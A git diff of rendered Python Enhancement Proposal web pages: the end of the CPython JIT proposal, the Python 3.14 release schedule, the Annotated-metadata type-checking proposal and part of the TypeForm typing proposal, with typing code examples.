Since the code templates emitted by the JIT are compiled by Clang, it may be +possible to allow JIT frames to be traced through by simply modifying the +compiler flags to use frame pointers more carefully. It may also be possible to +harvest and emit the debugging information produced by Clang. Neither of these +ideas have been explored very deeply.

+

While this is an issue that should be fixed, fixing it is not a particularly +high priority at this time. This is probably a problem best explored by somebody +with more domain expertise in collaboration with those maintaining the JIT, who +have little experience with the inner workings of these tools.

+
+
+
+

Security Implications

+

This JIT, like any JIT, produces large amounts of executable data at runtime. +This introduces a potential new attack surface to CPython, since a malicious +actor capable of influencing the contents of this data is therefore capable of +executing arbitrary code. This is a well-known vulnerability of JIT +compilers.

+

In order to mitigate this risk, the JIT has been written with best practices in +mind. In particular, the data in question is not exposed by the JIT compiler to +other parts of the program while it remains writable, and at no point is the +data both writable and executable.

+

The nature of template-based JITs also seriously limits the kinds of code that +can be generated, further reducing the likelihood of a successful exploit. As an +additional precaution, the templates themselves are stored in static, read-only +memory.

+

However, it would be naive to assume that no possible vulnerabilities exist in +the JIT, especially at this early stage. The author is not a security expert, +but is available to join or work closely with the Python Security Response Team +to triage and fix security issues as they arise.

+
+

Apple Silicon

+

Though difficult to test without actually signing and packaging a macOS release, +it appears that macOS releases should enable the JIT Entitlement for the +Hardened Runtime.

+

This shouldn’t make installing Python any harder, but may add additional steps +for release managers to perform.

+
+
+
+

How to Teach This

+

Choose the sections that best describe you:

+
    +
  • If you are a Python programmer or end user…
      +
    • …nothing changes for you. Nobody should be distributing JIT-enabled +CPython interpreters to you while it is still an experimental feature. Once +it is non-experimental, you will probably notice slightly better performance +and slightly higher memory usage. You shouldn’t be able to observe any other +changes.
    • +
    +
  • +
  • If you maintain third-party packages…
      +
    • …nothing changes for you. There are no API or ABI changes, and the JIT is +not exposed to third-party code. You shouldn’t need to change your CI +matrix, and you shouldn’t be able to observe differences in the way your +packages work when the JIT is enabled.
    • +
    +
  • +
  • If you profile or debug Python code…
      +
    • …nothing changes for you. All Python profiling and tracing functionality +remains.
    • +
    +
  • +
  • If you profile or debug C code…
      +
    • …currently, the ability to trace through JIT frames is limited. This may +cause issues if you need to observe the entire C call stack, rather than +just “leaf” frames. See the Debugging section above for more information.
    • +
    +
  • +
  • If you compile your own Python interpreter…
      +
    • …if you don’t wish to build the JIT, you can simply ignore it. Otherwise, +you will need to install a compatible version of LLVM, and +pass the appropriate flag to the build scripts. Your build may take up to a +minute longer. Note that the JIT should not be distributed to end users or +used in production while it is still in the experimental phase.
    • +
    +
  • +
  • If you’re a maintainer of CPython (or a fork of CPython)…
      +
    • …and you change the bytecode definitions or the main interpreter +loop…
        +
      • …in general, the JIT shouldn’t be much of an inconvenience to you +(depending on what you’re trying to do). The micro-op interpreter isn’t +going anywhere, and still offers a debugging experience similar to what +the main bytecode interpreter provides today. There is moderate likelihood +that larger changes to the interpreter (such as adding new local +variables, changing error handling and deoptimization logic, or changing +the micro-op format) will require changes to the C template used to +generate the JIT, which is meant to mimic the main interpreter loop. You +may also occasionally just get unlucky and break JIT code generation, +which will require you to either modify the Python build scripts yourself, +or solicit the help of somebody more familiar with them (see below).
      • +
      +
    • +
    • …and you work on the JIT itself…
        +
      • …you hopefully already have a decent idea of what you’re getting +yourself into. You will be regularly modifying the Python build scripts, +the C template used to generate the JIT, and the C code that actually +makes up the runtime portion of the JIT. You will also be dealing with +all sorts of crashes, stepping over machine code in a debugger, staring at +COFF/ELF/Mach-O dumps, developing on a wide range of platforms, and +generally being the point of contact for the people changing the bytecode +when CI starts failing on their PRs (see above). Ideally, you’re at least +familiar with assembly, have taken a couple of courses with “compilers” +in their name, and have read a blog post or two about linkers.
      • +
      +
    • +
    • …and you maintain other parts of CPython…
        +
      • …nothing changes for you. You shouldn’t need to develop locally with JIT +builds. If you choose to do so (for example, to help reproduce and triage +JIT issues), your builds may take up to a minute longer each time the +relevant files are modified.
      • +
      +
    • +
    +
  • +
+
+
+

Reference Implementation

+

Key parts of the implementation include:

+ +
+
+

Rejected Ideas

+
+

Maintain it outside of CPython

+

While it is probably possible to maintain the JIT outside of CPython, its +implementation is tied tightly enough to the rest of the interpreter that +keeping it up-to-date would probably be more difficult than actually developing +the JIT itself. Additionally, contributors working on the existing micro-op +definitions and optimizations would need to modify and build two separate +projects to measure the effects of their changes under the JIT (whereas today, +infrastructure exists to do this automatically for any proposed change).

+

Releases of the separate “JIT” project would probably also need to correspond to +specific CPython pre-releases and patch releases, depending on exactly what +changes are present. Individual CPython commits between releases likely wouldn’t +have corresponding JIT releases at all, further complicating debugging efforts +(such as bisection to find breaking changes upstream).

+

Since the JIT is already quite stable, and the ultimate goal is for it to be a +non-experimental part of CPython, keeping it in main seems to be the best +path forward. With that said, the relevant code is organized in such a way that +the JIT can be easily “deleted” if it does not end up meeting its goals.

+
+
+

Turn it on by default

+

On the other hand, some have suggested that the JIT should be enabled by default +in its current form.

+

Again, it is important to remember that a JIT is not a magic “go faster” +machine; currently, the JIT is about as fast as the existing specializing +interpreter. This may sound underwhelming, but it is actually a fairly +significant achievement, and it’s the main reason why this approach was +considered viable enough to be merged into main for further development.

+

While the JIT provides significant gains over the existing micro-op interpreter, +it isn’t yet a clear win when always enabled (especially considering its +increased memory consumption and additional build-time dependencies). That’s the +purpose of this PEP: to clarify expectations about the objective criteria that +should be met in order to “flip the switch”.

+

At least for now, having this in main, but off by default, seems to be a +good compromise between always turning it on and not having it available at all.

+
+
+

Support multiple compiler toolchains

+

Clang is specifically needed because it’s the only C compiler with support for +guaranteed tail calls (musttail), which are required by CPython’s +continuation-passing-style approach +to JIT compilation. Without it, the tail-recursive calls between templates could +result in unbounded C stack growth (and eventual overflow).

+

Since LLVM also includes other functionalities required by the JIT build process +(namely, utilities for object file parsing and disassembly), and additional +toolchains introduce additional testing and maintenance burden, it’s convenient +to only support one major version of one toolchain at this time.

+
+
+

Compile the base interpreter’s bytecode

+

Most of the prior art for copy-and-patch uses it as a fast baseline JIT, whereas +CPython’s JIT is using the technique to compile optimized micro-op traces.

+

In practice, the new JIT currently sits somewhere between the “baseline” and +“optimizing” compiler tiers of other dynamic language runtimes. This is because +CPython uses its specializing adaptive interpreter to collect runtime profiling +information, which is used to detect and optimize “hot” paths through the code. +This step is carried out using self-modifying code, a technique which is much +more difficult to implement with a JIT compiler.

+

While it’s possible to compile normal bytecode using copy-and-patch (in fact,
early prototypes predated the micro-op interpreter and did exactly this), it
just doesn’t seem to provide as much optimization potential as the more granular
micro-op format.

+
+
+

Add GPU support

+

The JIT is currently CPU-only. It does not, for example, offload NumPy array +computations to CUDA GPUs, as JITs like Numba do.

+

There is already a rich ecosystem of tools for accelerating these sorts of +specialized tasks, and CPython’s JIT is not intended to replace them. Instead, +it is meant to improve the performance of general-purpose Python code, which is +less likely to benefit from deeper GPU integration.

+
+
+
+

Open Issues

+
+

Speed

+

Currently, the JIT is about as fast as the existing specializing interpreter +on most platforms. Improving this is obviously a top priority at this point, +since providing a significant performance gain is the entire motivation for +having a JIT at all. A number of proposed improvements are already underway, and +this ongoing work is being tracked in GH-115802.

+
+
+

Memory

+

Because it allocates additional memory for executable machine code, the JIT does +use more memory than the existing interpreter at runtime. According to the +official benchmarks, the JIT currently uses about 10-20% more memory than the +base interpreter. +The upper end of this range is due to aarch64-apple-darwin, which has larger +page sizes (and thus, a larger minimum allocation granularity).

+

However, these numbers should be taken with a grain of salt, as the benchmarks +themselves don’t actually have a very high baseline of memory usage. Since they +have a higher ratio of code to data, the JIT’s memory overhead is more +pronounced than it would be in a typical workload where memory pressure is more +likely to be a real concern.

+

Not much effort has been put into optimizing the JIT’s memory usage yet, so +these numbers likely represent a maximum that will be reduced over time. +Improving this is a medium priority, and is being tracked in GH-116017. We may consider +exposing configurable parameters for limiting memory consumption in the +future, but no official APIs will be exposed until the JIT meets the +requirements to be considered non-experimental.

+

Earlier versions of the JIT had a more complicated memory allocation scheme
which imposed a number of fragile limitations on the size and layout of the
emitted code, and significantly bloated the memory footprint of the Python
executable. These issues are no longer present in the current design.

+
+
+

Dependencies

+

At the time of writing, the JIT has a build-time dependency on LLVM. LLVM +is used to compile individual micro-op instructions into blobs of machine code, +which are then linked together to form the JIT’s templates. These templates are +used to build CPython itself. The JIT has no runtime dependency on LLVM and is +therefore not at all exposed as a dependency to end users.

+

Building the JIT adds between 3 and 60 seconds to the build process, depending +on platform. It is only rebuilt whenever the generated files become out-of-date, +so only those who are actively developing the main interpreter loop will be +rebuilding it with any frequency.

+

Unlike many other generated files in CPython, the JIT’s generated files are not +tracked by Git. This is because they contain compiled binary code templates +specific to not only the host platform, but also the current build configuration +for that platform. As such, hosting them would require a significant engineering +effort in order to build and host dozens of large binary files for each commit +that changes the generated code. While perhaps feasible, this is not a priority, +since installing the required tools is not prohibitively difficult for most +people building CPython, and the build step is not particularly time-consuming.

+

Since some remain interested in this possibility, discussion is being
tracked in GH-115869.

+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0744.rst

+

Last modified: 2024-09-12 20:31:23 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0745/index.html b/pep-0745/index.html new file mode 100644 index 00000000000..b7cf1675579 --- /dev/null +++ b/pep-0745/index.html @@ -0,0 +1,198 @@ + + + + + + + + PEP 745 – Python 3.14 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 745 – Python 3.14 Release Schedule

+
+
Author:
+
Hugo van Kemenade
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
24-Apr-2024
+
Python-Version:
+
3.14
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.14.

+
+
+

Release Manager and Crew

+
    +
  • 3.14 Release Manager: Hugo van Kemenade
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.14.0 schedule

+

The dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.14 development begins: Wednesday, 2024-05-08
  • +
  • 3.14.0 alpha 1: Tuesday, 2024-10-15
  • +
  • 3.14.0 alpha 2: Tuesday, 2024-11-19
  • +
  • 3.14.0 alpha 3: Tuesday, 2024-12-17
  • +
+

Expected:

+
    +
  • 3.14.0 alpha 4: Tuesday, 2025-01-14
  • +
  • 3.14.0 alpha 5: Tuesday, 2025-02-11
  • +
  • 3.14.0 alpha 6: Friday, 2025-03-14
  • +
  • 3.14.0 alpha 7: Tuesday, 2025-04-08
  • +
  • 3.14.0 beta 1: Tuesday, 2025-05-06 +(No new features beyond this point.)
  • +
  • 3.14.0 beta 2: Tuesday, 2025-05-27
  • +
  • 3.14.0 beta 3: Tuesday, 2025-06-17
  • +
  • 3.14.0 beta 4: Tuesday, 2025-07-08
  • +
  • 3.14.0 candidate 1: Tuesday, 2025-07-22
  • +
  • 3.14.0 candidate 2: Tuesday, 2025-08-26
  • +
  • 3.14.0 final: Wednesday, 2025-10-01
  • +
+

Subsequent bugfix releases every two months.

+
+
+

3.14 lifespan

+

Python 3.14 will receive bugfix updates approximately every two months for +approximately 24 months. Around the time of the release of 3.16.0 final, the +final 3.14 bugfix update will be released. After that, it is expected that +security updates (source only) will be released until five years after the +release of 3.14.0 final, so until approximately October 2030.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0745.rst

+

Last modified: 2024-12-17 16:46:38 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0746/index.html b/pep-0746/index.html new file mode 100644 index 00000000000..e7aa744bffa --- /dev/null +++ b/pep-0746/index.html @@ -0,0 +1,293 @@ + + + + + + + + PEP 746 – Type checking Annotated metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 746 – Type checking Annotated metadata

+
+
Author:
+
Adrian Garcia Badaracco <adrian at adriangb.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
20-May-2024
+
Python-Version:
+
3.14
+
Post-History:
+
20-May-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a mechanism for type checking metadata that uses +the typing.Annotated type. Metadata objects that implement +the new __supports_annotated_base__ protocol will be type checked by static +type checkers to ensure that the metadata is valid for the given type.

+
+
+

Motivation

+

PEP 593 introduced Annotated as a way to attach runtime metadata to types. +In general, the metadata is not meant for static type checkers, but even so, +it is often useful to be able to check that the metadata makes sense for the given +type.

+

Take the first example in PEP 593, which uses Annotated to attach +serialization information to a field:

+
class Student(struct2.Packed):
+    name: Annotated[str, struct2.ctype("<10s")]
+
+
+

Here, the struct2.ctype("<10s") metadata is meant to be used by a serialization +library to serialize the field. Such libraries can only serialize a subset of types: +it would not make sense to write, for example, Annotated[list[str], struct2.ctype("<10s")]. +Yet the type system provides no way to enforce this. The metadata are completely +ignored by type checkers.

+

This use case comes up in libraries like pydantic and msgspec, which use
Annotated to attach validation and conversion information to fields, or fastapi,
which uses Annotated to mark parameters as extracted from headers, query strings, or
dependency injection.

+
+
+

Specification

+

This PEP introduces a protocol that can be used by static and runtime type checkers to validate +the consistency between Annotated metadata and a given type. +Objects that implement this protocol have an attribute called __supports_annotated_base__ +that specifies whether the metadata is valid for a given type:

+
class Int64:
+    __supports_annotated_base__: int
+
+
+

The attribute may also be marked as a ClassVar to avoid interaction with dataclasses:

+
from dataclasses import dataclass
+from typing import ClassVar
+
+@dataclass
+class Gt:
+    value: int
+    __supports_annotated_base__: ClassVar[int]
+
+
+

When a static type checker encounters a type expression of the form Annotated[T, M1, M2, ...], +it should enforce that for each metadata element in M1, M2, ..., one of the following is true:

+
    +
  • The metadata element evaluates to an object that does not have a __supports_annotated_base__ attribute; or
  • +
  • The metadata element evaluates to an object M that has a __supports_annotated_base__ attribute; +and T is assignable to the type of M.__supports_annotated_base__.
  • +
+

To support generic Gt metadata, one might write:

+
from typing import Protocol
+
+class SupportsGt[T](Protocol):
+    def __gt__(self, __other: T) -> bool:
+        ...
+
+class Gt[T]:
+    __supports_annotated_base__: ClassVar[SupportsGt[T]]
+
+    def __init__(self, value: T) -> None:
+        self.value = value
+
+x1: Annotated[int, Gt(0)] = 1  # OK
+x2: Annotated[str, Gt(0)] = 0  # type checker error: str is not assignable to SupportsGt[int]
+x3: Annotated[int, Gt(1)] = 0  # OK for static type checkers; runtime type checkers may flag this
+
+
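Runtime checkers can consume the same attribute. The following is a minimal,
hedged sketch of how a runtime helper might flag invalid metadata;
check_annotated is purely illustrative, handles only the plain
class-vs-class case (not generics like Gt above), and is not part of this
specification:

from typing import Annotated, ClassVar, get_args, get_origin, get_type_hints

class Int64:
    __supports_annotated_base__: ClassVar[int]

def check_annotated(annotation: object) -> list[str]:
    """Return error messages for metadata that rejects the annotated base type."""
    errors: list[str] = []
    if get_origin(annotation) is not Annotated:
        return errors
    base, *metadata = get_args(annotation)
    for meta in metadata:
        hints = get_type_hints(type(meta))
        expected = hints.get("__supports_annotated_base__")
        if get_origin(expected) is ClassVar:  # unwrap ClassVar[...]
            expected = get_args(expected)[0]
        # Only the simple class-vs-class case is handled here.
        if isinstance(expected, type) and isinstance(base, type):
            if not issubclass(base, expected):
                errors.append(f"{meta!r} does not support base type {base.__name__}")
    return errors

print(check_annotated(Annotated[int, Int64()]))  # []
print(check_annotated(Annotated[str, Int64()]))  # flags Int64()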
+
+
+

Backwards Compatibility

+

Metadata that does not implement the protocol will be considered valid for all types, +so no breaking changes are introduced for existing code. The new checks only apply +to metadata objects that explicitly implement the protocol specified by this PEP.

+
+
+

Security Implications

+

None.

+
+
+

How to Teach This

+

This protocol is intended mostly for libraries that provide Annotated metadata; +end users of those libraries are unlikely to need to implement the protocol themselves. +The protocol should be mentioned in the documentation for typing.Annotated and +in the typing specification.

+
+
+

Reference Implementation

+

None yet.

+
+
+

Rejected ideas

+
+

Introducing a type variable instead of a generic class

+

We considered using a special type variable, AnnotatedT = TypeVar("AnnotatedT"), +to represent the type T of the inner type in Annotated; metadata would be +type checked against this type variable. However, this would require using the old +type variable syntax (before PEP 695), which is now a discouraged feature. +In addition, this would use type variables in an unusual way that does not fit well +with the rest of the type system.

+
+
+

Introducing a new type to typing.py that all metadata objects should subclass

+

A previous version of this PEP suggested adding a new generic base class, TypedMetadata[U], +that metadata objects would subclass. If a metadata object is a subclass of TypedMetadata[U], +then type checkers would check that the annotation’s base type is assignable to U. +However, this mechanism does not integrate as well with the rest of the language; Python +does not generally use marker base classes. In addition, it provides less flexibility than +the current proposal: it would not allow overloads, and it would require metadata objects +to add a new base class, which may make their runtime implementation more complex.

+
+
+

Using a method instead of an attribute for __supports_annotated_base__

+

We considered using a method instead of an attribute for the protocol, so that the method
could be used at runtime to check the validity of the metadata and to support overloads or
returning boolean literals. However, using a method adds boilerplate to the implementation,
and the value of the runtime use cases, or of more complex scenarios involving overloads
and boolean literals, was not clear.

+
+
+
+

Acknowledgments

+

We thank Eric Traut for suggesting the idea of using a protocol and implementing provisional support in Pyright. +Thank you to Jelle Zijlstra for sponsoring this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0746.rst

+

Last modified: 2024-10-05 22:29:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0747/index.html b/pep-0747/index.html new file mode 100644 index 00000000000..7d487aeae33 --- /dev/null +++ b/pep-0747/index.html @@ -0,0 +1,719 @@ + + + + + + + + PEP 747 – Annotating Type Forms | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 747 – Annotating Type Forms

+
+
Author:
+
David Foster <david at dafoster.net>, Eric Traut <erictr at microsoft.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
27-May-2024
+
Python-Version:
+
3.14
+
Post-History:
+
19-Apr-2024, 04-May-2024, 17-Jun-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Type expressions provide a standardized way +to specify types in the Python type system. When a type expression is +evaluated at runtime, the resulting type form object encodes the information +supplied in the type expression. This enables a variety of use cases including +runtime type checking, introspection, and metaprogramming.

+

Such use cases have proliferated, but there is currently no way to accurately +annotate functions that accept type form objects. Developers are forced to use +an overly-wide type like object, which makes some use cases impossible and +generally reduces type safety. This PEP addresses this limitation by +introducing a new special form typing.TypeForm.

+

This PEP makes no changes to the Python grammar. Correct usage of TypeForm is +intended to be enforced only by type checkers, not by the Python runtime.

+
+
+

Motivation

+

A function that operates on type form objects must understand how type +expression details are encoded in these objects. For example, int | str, +"int | str", list[int], and MyTypeAlias are all valid type +expressions, and they evaluate to instances of types.UnionType, +builtins.str, types.GenericAlias, and typing.TypeAliasType, +respectively.

+

There is currently no way to indicate to a type checker that a function accepts +type form objects and knows how to work with them. TypeForm addresses this +limitation. For example, here is a function that checks whether a value is +assignable to a specified type and returns None if it is not:

+
def trycast[T](typx: TypeForm[T], value: object) -> T | None: ...
+
+
+

The use of TypeForm and the type variable T describes a relationship +between the type form passed to parameter typx and the function’s +return type.
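For example (hypothetical usage of the trycast stub above):

num = trycast(int | None, 42)
reveal_type(num)  # Revealed type is "int | None"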

+

TypeForm can also be used with TypeIs to define custom type +narrowing behaviors:

+
def isassignable[T](value: object, typx: TypeForm[T]) -> TypeIs[T]: ...
+
+request_json: object = ...
+if isassignable(request_json, MyTypedDict):
+    assert_type(request_json, MyTypedDict)  # Type of variable is narrowed
+
+
+

The isassignable function implements something like an enhanced +isinstance check. This is useful for validating whether a value decoded +from JSON conforms to a particular structure of nested TypedDicts, +lists, unions, Literals, or any other type form that can be described +with a type expression. This kind of check was alluded to in +PEP 589 but could not be implemented without +TypeForm.

+
+

Why not type[C]?

+

One might think that type[C] would suffice for these use cases. However, +only class objects (instances of the builtins.type class) are assignable +to type[C]. Many type form objects do not meet this requirement:

+
def trycast[T](typx: type[T], value: object) -> T | None: ...
+
+trycast(str, 'hi')  # OK
+trycast(Literal['hi'], 'hi')  # Type violation
+trycast(str | None, 'hi')  # Type violation
+trycast(MyProtocolClass, obj)  # Type violation
+
+
+
+
+

TypeForm use cases

+

A survey of Python libraries reveals several categories of functions that +would benefit from TypeForm:

+
    +
  • Assignability checkers:
      +
    • Determines whether a value is assignable to a specified type
    • +
    • Pattern 1: def is_assignable[T](value: object, typx: TypeForm[T]) -> TypeIs[T]
    • +
    • Pattern 2: def is_match[T](value: object, typx: TypeForm[T]) -> TypeGuard[T]
    • +
    • Examples: beartype.is_bearable, trycast.isassignable, +typeguard.check_type, xdsl.isa
    • +
    +
  • +
+
    +
  • Converters:
      +
    • If a value is assignable to (or coercible to) a specified type, +a converter returns the value narrowed to (or coerced to) that type. +Otherwise, an exception is raised.
    • +
    • Pattern 1:
      def convert[T](value: object, typx: TypeForm[T]) -> T
      +
      +
      + +
    • +
    • Pattern 2:
      class Converter[T]:
      +    def __init__(self, typx: TypeForm[T]) -> None: ...
      +    def convert(self, value: object) -> T: ...
      +
      +
      + +
    • +
    +
  • +
+ +

The survey also identified some introspection functions that accept runtime +type forms as input. Today, these functions are annotated with object:

+
    +
  • General introspection operations: +
  • +
+

These functions accept values evaluated from arbitrary annotation expressions, +not just type expressions, so they cannot be altered to use TypeForm.

+
+
+
+

Specification

+

When a type expression is evaluated at runtime, the resulting value is a +type form object. This value encodes the information supplied in the type +expression, and it represents the type described by that type expression.

+

TypeForm is a special form that, when used in a type expression, describes +a set of type form objects. It accepts a single type argument, which must be a +valid type expression. TypeForm[T] describes the set of all type form +objects that represent the type T or types that are +assignable to T. For example, +TypeForm[str | None] describes the set of all type form objects +that represent a type assignable to str | None:

+
ok1: TypeForm[str | None] = str | None  # OK
+ok2: TypeForm[str | None] = str   # OK
+ok3: TypeForm[str | None] = None  # OK
+ok4: TypeForm[str | None] = Literal[None]  # OK
+ok5: TypeForm[str | None] = Optional[str]  # OK
+ok6: TypeForm[str | None] = "str | None"  # OK
+ok7: TypeForm[str | None] = Any  # OK
+
+err1: TypeForm[str | None] = str | int  # Error
+err2: TypeForm[str | None] = list[str | None]  # Error
+
+
+

By this same definition, TypeForm[Any] describes a type form object +that represents the type Any or any type that is assignable to Any. +Since all types in the Python type system are assignable to Any, +TypeForm[Any] describes the set of all type form objects +evaluated from all valid type expressions.

+

The type expression TypeForm, with no type argument provided, is +equivalent to TypeForm[Any].

+
+

Implicit TypeForm Evaluation

+

When a static type checker encounters an expression that follows all of the +syntactic, semantic and contextual rules for a type expression as detailed +in the typing spec, the evaluated type of this expression should be assignable +to TypeForm[T] if the type it describes is assignable to T.

+

For example, if a static type checker encounters the expression str | None, +it may normally evaluate its type as UnionType because it produces a +runtime value that is an instance of types.UnionType. However, because +this expression is a valid type expression, it is also assignable to the +type TypeForm[str | None]:

+
v1_actual: UnionType = str | None  # OK
+v1_type_form: TypeForm[str | None] = str | None  # OK
+
+v2_actual: type = list[int]  # OK
+v2_type_form: TypeForm = list[int]  # OK
+
+
+

The Annotated special form is allowed in type expressions, so it can +also appear in an expression that is assignable to TypeForm. Consistent +with the typing spec’s rules for Annotated, a static type checker may choose +to ignore any Annotated metadata that it does not understand:

+
v3: TypeForm[int | str] = Annotated[int | str, "metadata"]  # OK
+v4: TypeForm[Annotated[int | str, "metadata"]] = int | str  # OK
+
+
+

A string literal expression containing a valid type expression should likewise +be assignable to TypeForm:

+
v5: TypeForm[set[str]] = "set[str]"  # OK
+
+
+

Expressions that violate one or more of the syntactic, semantic, or contextual +rules for type expressions should not evaluate to a TypeForm type. The rules +for type expression validity are explained in detail within the typing spec, so +they are not repeated here:

+
bad1: TypeForm = tuple()  # Error: Call expression not allowed in type expression
+bad2: TypeForm = (1, 2)  # Error: Tuple expression not allowed in type expression
+bad3: TypeForm = 1  # Non-class object not allowed in type expression
+bad4: TypeForm = Self  # Error: Self not allowed outside of a class
+bad5: TypeForm = Literal[var]  # Error: Variable not allowed in type expression
+bad6: TypeForm = Literal[f""]  # Error: f-strings not allowed in type expression
+bad7: TypeForm = ClassVar[int]  # Error: ClassVar not allowed in type expression
+bad8: TypeForm = Required[int]  # Error: Required not allowed in type expression
+bad9: TypeForm = Final[int]  # Error: Final not allowed in type expression
+bad10: TypeForm = Unpack[Ts]  # Error: Unpack not allowed in this context
+bad11: TypeForm = Optional  # Error: Invalid use of Optional special form
+bad12: TypeForm = T  # Error if T is an out-of-scope TypeVar
+bad13: TypeForm = "int + str"  # Error: invalid quoted type expression
+
+
+
+
+

Explicit TypeForm Evaluation

+

TypeForm also acts as a function that can be called with a single argument. +Type checkers should validate that this argument is a valid type expression:

+
x1 = TypeForm(str | None)
+reveal_type(x1)  # Revealed type is "TypeForm[str | None]"
+
+x2 = TypeForm("list[int]")
+reveal_type(x2)  # Revealed type is "TypeForm[list[int]]"
+
+x3 = TypeForm('type(1)')  # Error: invalid type expression
+
+
+

At runtime the TypeForm(...) callable simply returns the value passed to it.

+

This explicit syntax serves two purposes. First, it documents the developer’s +intent to use the value as a type form object. Second, static type checkers +validate that all rules for type expressions are followed:

+
x4 = type(int)  # No error, evaluates to "type[int]"
+
+x5 = TypeForm(type(int))  # Error: call not allowed in type expression
+
+
+
+
+

Assignability

+

TypeForm has a single type parameter, which is covariant. That means +TypeForm[B] is assignable to TypeForm[A] if B is assignable to +A:

+
def get_type_form() -> TypeForm[int]: ...
+
+t1: TypeForm[int | str] = get_type_form()  # OK
+t2: TypeForm[str] = get_type_form()  # Error
+
+
+

type[T] is a subtype of TypeForm[T], which means that type[B] is +assignable to TypeForm[A] if B is assignable to A:

+
def get_type() -> type[int]: ...
+
+t3: TypeForm[int | str] = get_type()  # OK
+t4: TypeForm[str] = get_type()  # Error
+
+
+

TypeForm is a subtype of object and is assumed to have all of the +attributes and methods of object.

+
+
+
+

Backward Compatibility

+

This PEP clarifies static type checker behaviors when evaluating type +expressions in “value expression” contexts (that is, contexts where type +expressions are not mandated by the typing spec). In the absence of a +TypeForm type annotation, existing type evaluation behaviors persist, +so no backward compatibility issues are anticipated. For example, if a static +type checker previously evaluated the type of expression str | None as +UnionType, it will continue to do so unless this expression is assigned +to a variable or parameter whose type is annotated as TypeForm.

+
+
+

How to Teach This

+

Type expressions are used in annotations to describe which values are accepted +by a function parameter, returned by a function, or stored in a variable:

+
              parameter type   return type
+              |                |
+              v                v
+def plus(n1: int, n2: int) -> int:
+    sum: int = n1 + n2
+          ^
+          |
+          variable type
+
+    return sum
+
+
+

Type expressions evaluate to valid type form objects at runtime and can be +assigned to variables and manipulated like any other data in a program:

+
 a variable                   a type expression
+ |                            |
+ v                            v
+int_type_form: TypeForm = int | None
+                 ^
+                 |
+                 the type of a type form object
+
+
+

TypeForm[] is how you spell the type of a type form object, which is +a runtime representation of a type.

+

TypeForm is similar to type, but type is compatible only with +class objects like int, str, list, or MyClass. +TypeForm accommodates any type form that can be expressed using +a valid type expression, including those with brackets (list[int]), union +operators (int | None), and special forms (Any, LiteralString, +Never, etc.).

+

Most programmers will not define their own functions that accept a TypeForm +parameter or return a TypeForm value. It is more common to pass a type +form object to a library function that knows how to decode and use such objects.

+

For example, the isassignable function in the trycast library +can be used like Python’s built-in isinstance function to check whether +a value matches the shape of a particular type. isassignable accepts any +type form object as input.

+
    +
  • Yes:
    from trycast import isassignable
    +
    +if isassignable(some_object, MyTypedDict):  # OK: MyTypedDict is a TypeForm[]
    +    ...
    +
    +
    +
  • +
  • No:
    if isinstance(some_object, MyTypedDict):  # ERROR: MyTypedDict is not a type[]
    +    ...
    +
    +
    +
  • +
+
+
+

Advanced Examples

+

If you want to write your own runtime type checker or a function that +manipulates type form objects as values at runtime, this section provides +examples of how such a function can use TypeForm.

+
+

Introspecting type form objects

+

Functions like typing.get_origin and typing.get_args can be used to +extract components of some type form objects.

+
import typing
+from typing import cast
+
+def strip_annotated_metadata[T](typx: TypeForm[T]) -> TypeForm[T]:
+    if typing.get_origin(typx) is typing.Annotated:
+        typx = cast(TypeForm[T], typing.get_args(typx)[0])
+    return typx
+
+
+

isinstance and is can also be used to distinguish between different +kinds of type form objects:

+
import types
+import typing
+
+def split_union(typx: TypeForm) -> tuple[TypeForm, ...]:
+    if isinstance(typx, types.UnionType):  # X | Y
+        return typing.cast(tuple[TypeForm, ...], typing.get_args(typx))
+    if typing.get_origin(typx) is typing.Union:  # Union[X, Y]
+        return typing.cast(tuple[TypeForm, ...], typing.get_args(typx))
+    if typx in (typing.Never, typing.NoReturn):
+        return ()
+    return (typx,)
+
+
+
+
+

Combining with a type variable

+

TypeForm can be parameterized by a type variable that is used elsewhere +within the same function definition:

+
def as_instance[T](typx: TypeForm[T]) -> T | None:
+    return typx() if isinstance(typx, type) else None
+
+
+
+
+

Combining with type

+

Both TypeForm and type can be parameterized by the same type +variable within the same function definition:

+
def as_type[T](typx: TypeForm[T]) -> type[T] | None:
+    return typx if isinstance(typx, type) else None
+
+
+
+
+

Combining with TypeIs and TypeGuard

+

A type variable can also be used by a TypeIs or TypeGuard return type:

+
def isassignable[T](value: object, typx: TypeForm[T]) -> TypeIs[T]: ...
+
+count: int | str = ...
+if isassignable(count, int):
